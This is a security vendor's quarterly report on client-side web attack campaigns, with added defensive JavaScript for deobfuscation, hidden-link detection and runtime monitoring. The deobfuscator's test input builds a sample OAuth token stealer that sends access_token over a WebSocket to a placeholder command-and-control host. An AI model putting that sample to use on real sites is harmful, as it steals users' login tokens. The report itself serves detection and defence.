Executive Summary
Q2 2025 continued to demonstrate the scale and sophistication of client-side attacks, affecting websites across a wide range of industries, with a particular concentration on WordPress-powered platforms. cside’s research uncovered over 72,000 compromised websites and showed how attackers rely on JavaScript-based delivery mechanisms, third-party supply chain vulnerabilities, and deceptive browser-based social engineering such as fake browser updates.
For CISOs, digital risk leaders, and security stakeholders, this report outlines the most critical campaigns detected this quarter, presenting both technical detail and strategic insight to support proactive decision-making.
Key Insight for Executives: Modern cyber threats increasingly exploit browser-based interactions and user trust in common CMS platforms. Defending against them requires visibility into runtime behavior, rigorous script governance, and coordinated threat intelligence. Client-side attacks targeting cryptocurrency platforms and payment environments carry outsized risk despite representing a small share of total incidents.
Major Client-Side Campaigns
1. Chinese PWA Injection Scam – Mobile Targeting with Adult Themes
- First spotted in June 2025, this campaign has already hit over 10,000 websites and is still active.
- Root Cause: Code injected into the service worker and PWA logic of popular themes and templates.
- Attack Infrastructure: Rotating subdomains tied to adult-themed APK lures; domains such as qaztool[.]com and its subdomains served the injected iframes, which took over the entire viewport.
- What makes this attack unique?
- It triggers only on mobile devices.
- It encourages installation of malicious PWAs posing as adult apps.
- It uses fingerprinting and cloaking to evade sandboxes.
- Key Takeaway: This attack does not stop at the browser session; once a malicious PWA is installed, the user’s device is at long-term risk.
2. Weaponized Google OAuth + WebSocket Abuse
- Detected: May 2025
- Websites Impacted: 22
Root Cause: Legitimate OAuth callback URLs hijacked to trigger malicious JavaScript functions.
Attack Infrastructure: Abuse of Google OAuth response tokens, with payloads delivered through dynamic eval(atob(...)) calls and obfuscated WebSocket endpoints.
Notable Traits:
- The script activates only after the user authenticates with Google
- Acts as a session-aware beacon or token stealer
- WebSocket exfiltration evades traffic monitoring tuned to HTTP request/response pairs
Why this matters: Attackers are hijacking trusted login systems like Google OAuth, something users inherently trust.
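The eval(atob(...)) wrapping and WebSocket endpoints described above are what an analyst has to unwind when triaging a captured script. The following is an added example, not code from cside or from the campaign: it peels nested eval(atob("...")) layers, collects any ws:// or wss:// endpoints that appear in the decoded layers, and checks whether the script reads an OAuth token out of the callback URL. SAMPLE_SCRIPT is a constructed stand-in, and the .invalid domains are placeholders.

```javascript
// Added example (not cside's code): peel nested eval(atob("...")) layers from a
// captured script and pull out network indicators and OAuth-token handling.
// SAMPLE_SCRIPT is a constructed stand-in; the domains are .invalid placeholders.

const EVAL_ATOB = /eval\s*\(\s*atob\s*\(\s*(['"`])([A-Za-z0-9+/=\s]+)\1\s*\)\s*\)/g;
const WS_URL = /wss?:\/\/[^\s'"`)]+/g;

// Decode base64 the way the browser's atob() would, ignoring whitespace.
function b64decode(s) {
  return Buffer.from(s.replace(/\s+/g, ''), 'base64').toString('utf8');
}

// Unwrap eval(atob(...)) layers, outermost first. maxDepth bounds the loop so a
// payload that re-encodes itself cannot spin the analyser forever.
function peelLayers(script, maxDepth = 5) {
  const layers = [];
  let current = script;
  for (let depth = 0; depth < maxDepth; depth++) {
    const matches = [...current.matchAll(EVAL_ATOB)];
    if (matches.length === 0) break;
    current = matches.map(m => b64decode(m[2])).join('\n');
    layers.push(current);
  }
  return layers;
}

// Summarise what the script does once every layer is decoded.
function extractIndicators(script) {
  const layers = peelLayers(script);
  const text = [script, ...layers].join('\n');
  const websockets = [...new Set(text.match(WS_URL) || [])];
  // Reads an OAuth artefact (token or auth code) out of the callback URL?
  const readsOAuthToken =
    /access_token|id_token|[?&#]code=/.test(text) &&
    /location\.(hash|search)|URLSearchParams/.test(text);
  return { layers: layers.length, websockets, readsOAuthToken };
}

// Constructed sample: an OAuth-gated token stealer wrapped in two eval(atob()) layers.
const INNER =
  'const p=new URLSearchParams(location.hash.slice(1));' +
  'const ws=new WebSocket("wss://c2.example.invalid/s");' +
  'ws.onopen=()=>ws.send(p.get("access_token"));';
const MIDDLE =
  'if(/accounts\\.google\\.com/.test(document.referrer)){eval(atob("' +
  Buffer.from(INNER).toString('base64') + '"))}';
const SAMPLE_SCRIPT =
  'window.addEventListener("load",()=>{eval(atob("' +
  Buffer.from(MIDDLE).toString('base64') + '"))});';

console.log(JSON.stringify(extractIndicators(SAMPLE_SCRIPT), null, 2));
```

Run it against a script pulled from a compromised page: two or more decoded layers, a WebSocket endpoint that only appears after decoding, and token handling tied to location.hash are the combination this campaign shows. Obfuscators that build the base64 string at runtime (string concatenation, String.fromCharCode) will defeat the static regex; those samples need a sandboxed run with atob and WebSocket hooked.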
3. CoinMarketCap Clone - Fake Wallet Drainer
- Detected: May 2025
- Websites Impacted: Targeted, high-value clones, with victim traffic intercepted via SEO spoofing
Root Cause: Fake CoinMarketCap clones injected into ad networks and typo-squatted domains
Attack Infrastructure: Spoofed domains mimicking CoinMarketCap UI, with embedded credential stealers and wallet drainers
Notable Traits:
- Pixel-perfect replication of CoinMarketCap’s frontend
- Credential harvesting via fake login modals
- Wallet drainer scripts triggered post-authentication
- In some versions, used ChatGPT UI as secondary lure
Strategic Risk: Phishing that impersonates highly trusted crypto platforms leads to real asset loss and undermines trust in Web3.
4. ClickFix Abuse – Ruthless Multi-Platform Code Injection
- Detected: May 2025
Root Cause: Malicious use of the ClickFix plugin to inject arbitrary JavaScript into multiple CMS platforms.
Attack Infrastructure: Attackers leveraged ClickFix’s cross-platform compatibility to drop obfuscated payloads on WordPress, Joomla, and custom CMS setups.
Notable Traits:
- Dynamic script injection with contextual targeting
- Payloads included redirectors, tracking beacons, and skimmers
- Hard to trace due to use of plugin-native functions and randomized script paths
Strategic Risk: Persistent access across platforms enables attackers to rotate payloads post-compromise without further exploitation.
5. scriptapi[.]dev – SEO Poisoning for Fake Services
- Detected: April 2025
- Websites Impacted: ~500
Root Cause: Injected via a fake script source or a hijacked analytics plugin.
Attack Infrastructure: Spoofed script hosts injected hidden links and comment spam.
Notable Traits:
- Cloaked keyword stuffing targeting search engine crawlers
- Injected hundreds of outbound links invisibly
- Often paired with expired domain redirection
Strategic Risk: Major SEO penalties; used to manipulate search rankings for scam sites.
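The hidden outbound links this campaign injects are detectable from inside the page, because the links are present in the DOM but styled so that a human never sees them. The following is an added example, not code from cside: the decision logic takes plain link descriptors (href, computed style, bounding rectangle) so it runs and can be tested in Node, and the short collector at the bottom builds those descriptors from a live DOM when the file is pasted into a browser console. SITE_HOST and the sample links are constructed for the example.

```javascript
// Added example (not cside's code): flag hidden outbound links of the kind an
// SEO-poisoning injection leaves behind. The classifier works on plain link
// descriptors so it runs in Node; the collector at the bottom builds those
// descriptors from a live DOM in a browser.

const SITE_HOST = 'www.example.com'; // assumed first-party host

function hostOf(href, base = `https://${SITE_HOST}/`) {
  try { return new URL(href, base).hostname; } catch { return null; }
}

// First-party means the apex domain or any of its subdomains; a lookalike such
// as example.com.evil.invalid must not pass.
function isFirstParty(host) {
  const apex = SITE_HOST.replace(/^www\./, '');
  return host === apex || host.endsWith('.' + apex);
}

// Styles that hide a link from people while leaving it in the HTML for crawlers.
function isHidden(style, rect, viewport) {
  if (style.display === 'none' || style.visibility === 'hidden') return true;
  if (parseFloat(style.opacity) === 0) return true;
  if (parseFloat(style.fontSize) < 1) return true;          // font-size:0 trick
  if (rect.width === 0 || rect.height === 0) return true;   // also catches hidden ancestors
  if (rect.right <= 0 || rect.bottom <= 0) return true;     // text-indent / left:-9999px
  return false;
}

function findCloakedLinks(links, viewport) {
  const out = [];
  for (const l of links) {
    const host = hostOf(l.href);
    if (!host || isFirstParty(host)) continue;               // internal links are fine
    if (isHidden(l.style, l.rect, viewport)) out.push({ href: l.href, host, text: l.text });
  }
  return out;
}

// Count hidden links per destination host: the injected link farm stands out.
function hostCounts(cloaked) {
  const counts = {};
  for (const l of cloaked) counts[l.host] = (counts[l.host] || 0) + 1;
  return counts;
}

// Constructed sample: two normal links plus three injected, hidden outbound links.
const VIEWPORT = { width: 1280, height: 800 };
const visible = { display: 'block', visibility: 'visible', opacity: '1', fontSize: '16px' };
const rectOf = (x, y, w, h) => ({ left: x, top: y, right: x + w, bottom: y + h, width: w, height: h });
const SAMPLE_LINKS = [
  { href: '/about', text: 'About', style: visible, rect: rectOf(10, 10, 60, 20) },
  { href: 'https://partner.example.org/', text: 'Partner', style: visible, rect: rectOf(10, 40, 60, 20) },
  { href: 'https://pills.example.invalid/buy', text: 'cheap meds', style: { ...visible, display: 'none' }, rect: rectOf(0, 0, 0, 0) },
  { href: 'https://pills.example.invalid/sale', text: 'discount', style: visible, rect: rectOf(-9999, 10, 80, 20) },
  { href: 'https://casino.example.invalid/', text: 'play now', style: { ...visible, fontSize: '0px' }, rect: rectOf(10, 70, 0, 0) },
];

console.log(hostCounts(findCloakedLinks(SAMPLE_LINKS, VIEWPORT)));

// Browser-only collector: build the same descriptors from the live DOM.
if (typeof document !== 'undefined') {
  const links = [...document.querySelectorAll('a[href]')].map(a => ({
    href: a.href,
    text: a.textContent.trim(),
    style: getComputedStyle(a),
    rect: a.getBoundingClientRect(),
  }));
  console.table(findCloakedLinks(links, { width: innerWidth, height: innerHeight }));
}
```

A visible outbound link to a partner is not flagged; only hidden links to hosts outside the site's own domain are. This catches links hidden from humans in the served HTML. Crawler-side cloaking, where the server returns different HTML to a search engine user agent, is not visible from the browser at all and has to be checked by fetching the page with a crawler User-Agent and diffing it against a normal fetch.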
Strategic Recommendations for Executives and CISOs
As client-side threats become more sophisticated and evasive, enterprise defenders must adopt a layered and forward-looking approach to protect user trust, business continuity, and regulatory posture. Based on trends observed in Q2 2025, cside recommends the following strategic actions:
1. Client-Side Risk Governance
Make this a priority: review and monitor all third-party JavaScript before and after deployment. Every script, plugin, or dependency introduced into the user experience should be tracked, verified, and monitored in production.
2. Runtime Detection Capabilities
Invest in behavior-based monitoring of browser environments to detect malicious actions such as iframe injection, credential skimming, redirection loops, and unauthorized DOM manipulation: threats that are often invisible to static scanning tools.
3. Web CMS as a High-Value Target
Platforms like WordPress remain prime targets for attackers due to widespread adoption and inconsistent patch hygiene. Treat CMS environments with enterprise-grade rigor, including auto-patching, plugin vetting pipelines, and regular integrity checks.
4. Zero Trust for JavaScript Delivery
Assume no script is safe and apply Zero Trust rules to all JavaScript, including code from trusted sources. Treat compromise as the default assumption, enforce a Content Security Policy (CSP), and log every script execution and network request for anomaly detection and audit.
5. Response Playbooks & Threat Simulations
Develop and rehearse incident response playbooks focused on:
- Supply chain JavaScript compromises
- Client-side injection attacks
- Credential theft via fake login modals
Use real-world scenarios like Magecart, PWA abuse, and plugin hijacking as the basis for tabletop exercises.
Key Metrics Overview
Number of Websites Impacted by Attack Type
Strategic Trends Observed in Q2 2025
During Q2 2025, several evolving patterns defined the shifting client-side threat landscape:
1. Mobile-First Client-Side Attacks
Malicious campaigns increasingly prioritize mobile device targeting, particularly Android. From PWA-based redirections to APK dropper lures, attackers are optimizing payloads for mobile browsers where detection and sandboxing remain limited.
2. Weaponization of Legitimate Web Functionality
Campaigns in Q2 abused OAuth flows, service workers, and browser-native APIs to disguise malicious activity as normal user behavior. Examples include session hijacking through Google OAuth callbacks and persistent redirects injected via PWA service workers.
3. Erosion of Trust in Browser UI
We observed a rise in full-screen hijacks, fake login modals, and pixel-perfect clones of trusted platforms like CoinMarketCap. These attacks exploit user trust in the visual interface of the browser, bypassing traditional URL-based security cues.
4. WordPress Exploitation Remains Pervasive
WordPress continued to serve as the primary entry point for client-side compromise. Unpatched plugins and insecure themes enabled persistent injection via tactics like jquery.bond backdoors and ClickFix plugin abuse.
5. Cross-Platform Code Injection via ClickFix
The ClickFix plugin was abused to deploy client-side malware across WordPress, Joomla, and custom CMS platforms. Its flexible injection capabilities allowed attackers to tailor payloads by environment, ranging from credential stealers to ad fraud scripts. This marks a shift toward platform-agnostic exploitation, extending the reach of client-side attacks beyond WordPress alone.
Compliance and Regulatory Impact
This isn’t just a technical problem: client-side breaches can mean GDPR fines, lawsuits, and lost customer trust. Organizations must treat the browser-side environment as part of their regulated infrastructure.
1. General Data Protection Regulation (GDPR)
Client-side malware, redirects, or third-party script abuse can qualify as a breach of data protection obligations under Article 32 of the GDPR.
Implications:
- Fines up to €20 million or 4% of global annual revenue, whichever is higher
- Mandatory breach disclosure to supervisory authorities and affected users
- Reputational damage due to public reporting obligations
2. PCI-DSS Risk: Payment Page Skimming & Magecart
Client-side attacks like Magecart, formjacking, and checkout skimmers directly violate PCI-DSS v4.0 requirements, particularly 6.4.3 (management and authorization of scripts on payment pages) and 11.6.1 (change and tamper detection for payment pages).
Consequences:
- Fines and penalties from acquirers and card brands, and potential loss of PCI compliance
- Incident notification obligations to acquirers and card brands
- Brand damage, loss of consumer trust, and legal exposure
Given the ubiquity of JavaScript-based checkout flows, securing browser-side environments is no longer optional for PCI-compliant merchants.
3. California Consumer Privacy Act (CCPA)
Malicious scripts that exfiltrate or misuse personal information can trigger enforcement actions under the CCPA, including:
- Private right of action for California consumers
- Statutory damages for data breaches, even without regulatory involvement
- Additional scrutiny from state regulators if negligence is demonstrated
4. Brand Reputation & Legal Exposure
Beyond fines and formal penalties, client-side threats create compounding business risks:
- Customer lawsuits and loss of user trust
- Blocklisting by search engines and ad platforms (e.g., Google Safe Browsing)
- Affiliate network bans or revenue loss due to script-based fraud or hijacking
Risk Forecast Review - Q2 2025
At the start of Q2, cside projected several high-risk developments based on patterns from Q1. Below is a review of those forecasts, highlighting which threats materialized and which remain emerging or evolving.
Risk Forecast for Q3 2025
Based on attack trends observed in Q2, cside forecasts the following developments for Q3:
Strategic Recommendations for Executives and CISOs
Organizations must evolve beyond traditional perimeter-based defenses and embrace real-time browser security monitoring as a core component of their risk management strategy. Based on Q2 2025 insights, cside recommends the following actionable measures:
1. Client-Side Risk Governance
Establish formal governance policies for all client-side assets:
- Mandate pre-deployment review and post-deployment monitoring for third-party JavaScript
- Maintain an approved script inventory with versioning, hash validation, and integrity checks
2. Runtime Detection Capabilities
Deploy behavior-based monitoring tools to capture suspicious activity in the live browser environment, such as:
- Iframe injections and full-page takeovers
- Unauthorized DOM manipulation
- Unexpected outbound network connections
These detections should trigger alerts before users are impacted.
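The runtime detection capability described here, and in the earlier Strategic Recommendations section, comes down to two hooks in the page: a MutationObserver that classifies every element inserted into the DOM, and a wrapper around the WebSocket constructor that checks egress destinations. The following is an added example, not cside’s product or code: the classifiers take plain descriptors so they run and can be tested in Node, and the browser wiring at the bottom only executes when a window and document exist. The host allowlists and the /csm-report collector endpoint are assumptions for the example.

```javascript
// Added example (not cside's code): decision logic for a small in-page runtime
// monitor, plus the browser wiring that feeds it. Host allowlists and the
// /csm-report endpoint are assumptions for the example.

const ALLOWED_HOSTS = ['www.example.com', 'cdn.example.com'];   // scripts and frames
const ALLOWED_SOCKET_HOSTS = ['ws.example.com'];                // WebSocket egress

function hostOf(url, base = 'https://www.example.com/') {
  try { return new URL(url, base).hostname; } catch { return null; }
}

// A frame covering most of the viewport is a takeover whatever its src says.
function coversViewport(rect, viewport, threshold = 0.9) {
  const area = Math.max(0, rect.width) * Math.max(0, rect.height);
  const total = viewport.width * viewport.height;
  return total > 0 && area / total >= threshold;
}

// node is a plain descriptor: { tag, src, inline, rect }. A missing src (about:blank
// or srcdoc frames, inline scripts) is treated as unknown origin, not as safe.
function classifyInsertedNode(node, viewport) {
  const tag = node.tag.toLowerCase();
  const host = node.src ? hostOf(node.src) : null;
  if (tag === 'iframe') {
    if (node.rect && coversViewport(node.rect, viewport)) return 'iframe-takeover';
    if (!ALLOWED_HOSTS.includes(host)) return 'iframe-unknown-origin';
  } else if (tag === 'script') {
    if (node.inline) return 'inline-script';
    if (!ALLOWED_HOSTS.includes(host)) return 'script-unknown-origin';
  } else if (tag === 'form' || tag === 'input') {
    return 'form-change';   // fake login modals and skimmers add inputs late
  }
  return 'ok';
}

function classifySocket(url) {
  return ALLOWED_SOCKET_HOSTS.includes(hostOf(url)) ? 'ok' : 'socket-unknown-origin';
}

// Browser-only wiring. Load this as the first script in <head> so it sees
// everything that follows; anything inserted before it is out of scope.
if (typeof window !== 'undefined' && typeof document !== 'undefined') {
  const viewport = () => ({ width: window.innerWidth, height: window.innerHeight });
  const report = (kind, detail) => {
    const body = JSON.stringify({ kind, detail, page: location.href, at: Date.now() });
    if (navigator.sendBeacon) navigator.sendBeacon('/csm-report', body); // assumed collector
    else console.warn('[csm]', kind, detail);
  };

  new MutationObserver(mutations => {
    for (const m of mutations) for (const n of m.addedNodes) {
      if (n.nodeType !== Node.ELEMENT_NODE) continue;
      // The rect is measured at insertion; a frame that grows to full screen
      // after layout needs a delayed re-check in a production monitor.
      const kind = classifyInsertedNode({
        tag: n.tagName,
        src: n.getAttribute('src'),
        inline: n.tagName === 'SCRIPT' && !n.src,
        rect: n.getBoundingClientRect(),
      }, viewport());
      if (kind !== 'ok') report(kind, n.outerHTML.slice(0, 300));
    }
  }).observe(document.documentElement, { childList: true, subtree: true });

  // Wrap WebSocket so every outbound socket is checked against the allowlist.
  const NativeWebSocket = window.WebSocket;
  window.WebSocket = function WebSocket(url, protocols) {
    const kind = classifySocket(String(url));
    if (kind !== 'ok') report(kind, String(url));
    return protocols === undefined ? new NativeWebSocket(url) : new NativeWebSocket(url, protocols);
  };
  window.WebSocket.prototype = NativeWebSocket.prototype;
  Object.assign(window.WebSocket, { CONNECTING: 0, OPEN: 1, CLOSING: 2, CLOSED: 3 });
}
```

The example reports rather than blocks, which is the right first step: run it in report-only mode until the allowlists are complete, then decide what to block. Note that a script loaded before this monitor can capture the native WebSocket reference and bypass the wrapper, which is why load order matters and why a CSP connect-src restriction is the stronger control for egress.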
3. Zero Trust for Third-Party Content
Adopt Zero Trust principles for external content:
- Apply Content Security Policy (CSP) headers to restrict asset loading
- Enforce Subresource Integrity (SRI) for all third-party scripts
- Log and audit all dynamic script loads and inline script executions
4. Enhanced WordPress Security Posture
Harden your CMS surface area, especially WordPress:
- Enforce automated patching of core, plugin, and theme components
- Only allow vetted, security-audited plugins and themes
- Monitor for unauthorized admin account creation and privilege escalation
5. Prepare and Test Incident Response Playbooks
Develop and rehearse playbooks focused on modern client-side threats:
- JavaScript injection (e.g., Magecart, wallet drainers)
- Supply chain breaches (e.g., plugin or CDN compromise)
- SEO poisoning and domain reputation damage
Include clearly defined communication and disclosure workflows for regulatory bodies (GDPR, CCPA, PCI-DSS) in case of breach.
Final Words
The threat landscape in 2025 continues to shift. Attackers no longer need to breach servers; they only need to compromise a script. The browser is now the front line.
To stay ahead, organizations must move beyond server-centric defense models and invest in real-time, client-side threat detection and response. Even low-frequency, high-impact threats like crypto wallet drainers or card skimming attacks can result in significant financial loss and regulatory exposure.
At cside, we remain committed to uncovering and publishing emerging threats to empower defenders, strengthen digital trust, and make the web safer for everyone.